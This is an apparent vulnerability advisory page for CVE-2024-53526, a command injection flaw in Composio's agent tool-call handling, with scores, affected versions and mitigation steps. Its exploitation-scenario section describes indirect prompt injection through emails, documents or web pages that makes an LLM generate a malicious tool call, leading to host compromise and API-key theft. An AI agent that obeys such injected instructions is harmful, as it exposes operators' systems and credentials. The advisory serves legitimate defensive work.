AI Threat Alert
CVE-2024-53526: Composio: command injection in AI agent tool calls
GHSA-8h93-28hg-fj84 MEDIUM PoC AVAILABLEComposio versions 0.5.40–0.6.8 allow OS command injection through the handle_tool_calls function in its OpenAI, Claude, and Julep integrations — any AI agent pipeline using these packages is exposed. Upgrade to 0.6.9 immediately. The CVSS scope change (S:C) means a compromised agent process can pivot to other system components, elevating the real-world impact beyond the base score.
Risk Assessment
Rated medium (CVSS 6.4) but contextually elevated for AI agent deployments. Network-accessible with low privileges required and no user interaction needed. Scope change indicates blast radius extends beyond the vulnerable component. EPSS is low (0.75%) and not in CISA KEV, but composio is widely adopted in agentic AI stacks — the attack surface is material. Organizations running composio-based agents in production should treat this as high urgency.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| composio-claude | pip | >= 0.5.40, < 0.6.9 | 0.6.9 |
| composio-julep | pip | >= 0.5.40, < 0.6.9 | 0.6.9 |
| composio-openai | pip | >= 0.5.40, < 0.6.9 | 0.6.9 |
Severity & Risk
Attack Surface
Recommended Action
5 steps-
Upgrade composio-openai, composio-claude, and composio-julep to >= 0.6.9 immediately.
-
If patching is blocked, restrict network access to services using these packages and implement compensating controls at the network perimeter.
-
Audit all uses of handle_tool_calls in your codebase for any custom wrappers that may replicate the pattern.
-
Detect exploitation by monitoring for anomalous subprocess spawning from AI agent processes — unexpected shell invocations, child processes from Python interpreters, or lateral movement from agent hosts.
-
Apply least-privilege to agent runtime environments to limit blast radius in case of exploitation.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-53526?
Composio versions 0.5.40–0.6.8 allow OS command injection through the handle_tool_calls function in its OpenAI, Claude, and Julep integrations — any AI agent pipeline using these packages is exposed. Upgrade to 0.6.9 immediately. The CVSS scope change (S:C) means a compromised agent process can pivot to other system components, elevating the real-world impact beyond the base score.
Is CVE-2024-53526 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-53526, increasing the risk of exploitation.
How to fix CVE-2024-53526?
1. Upgrade composio-openai, composio-claude, and composio-julep to >= 0.6.9 immediately. 2. If patching is blocked, restrict network access to services using these packages and implement compensating controls at the network perimeter. 3. Audit all uses of handle_tool_calls in your codebase for any custom wrappers that may replicate the pattern. 4. Detect exploitation by monitoring for anomalous subprocess spawning from AI agent processes — unexpected shell invocations, child processes from Python interpreters, or lateral movement from agent hosts. 5. Apply least-privilege to agent runtime environments to limit blast radius in case of exploitation.
What systems are affected by CVE-2024-53526?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM tool-use pipelines, AI orchestration layers, multi-agent systems.
What is the CVSS score for CVE-2024-53526?
CVE-2024-53526 has a CVSS v3.1 base score of 6.4 (MEDIUM). The EPSS exploitation probability is 0.75%.
Technical Details
NVD Description
composio >=0.5.40 is vulnerable to Command Execution in composio_openai, composio_claude, and composio_julep via the handle_tool_calls function.
Exploitation Scenario
An attacker with low-privilege access to an application backed by a composio agent crafts tool call parameters containing shell metacharacters (e.g., semicolons, backticks, or pipe operators). When the LLM returns a tool call response incorporating these inputs, handle_tool_calls passes them unsanitized to command execution. In a more sophisticated chain, an adversary uses indirect prompt injection — embedding malicious instructions into data the LLM ingests (emails, documents, web pages) — causing the LLM itself to generate the malicious tool call payload. From there, the attacker gains arbitrary code execution on the agent host and can pivot to connected services, exfiltrate API keys from environment variables, or establish persistence.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N References
- github.com/ComposioHQ/composio/blob/11ee7470aa6543097ee30bb036af8e9726dc7a85/python/plugins/claude/composio_claude/toolset.py
- github.com/ComposioHQ/composio/blob/11ee7470aa6543097ee30bb036af8e9726dc7a85/python/plugins/julep/composio_julep/toolset.py
- github.com/ComposioHQ/composio/blob/11ee7470aa6543097ee30bb036af8e9726dc7a85/python/plugins/openai/composio_openai/toolset.py
- github.com/ComposioHQ/composio/commit/f496f7fa776335ae7825cad2991c9b38923271fc
- github.com/ComposioHQ/composio/issues/1073
- github.com/ComposioHQ/composio/pull/1107
- github.com/advisories/GHSA-8h93-28hg-fj84
- nvd.nist.gov/vuln/detail/CVE-2024-53526
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution